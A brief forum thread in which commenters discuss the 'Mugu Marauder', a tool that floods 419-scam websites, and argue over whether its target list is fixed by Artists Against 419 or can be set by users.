" Just to clarify things (again SIGH!) the targets list is defined by The Artists Against 419 and NO-ONE else." run the program moron, you can put any address in you want.

shit... no you can't... i saw the open blank for "targets" and thought I could type them in... still if you can create this anyone can, just a matter of time before there is a program that lets you select your own targets.

Re:great, this is exactly what i was afraid would.

[mugu_marauder]

just a matter of time before there is a program that lets you select your own targets.

Yes, but it won't be the Mugu Marauder.

The original and the best :D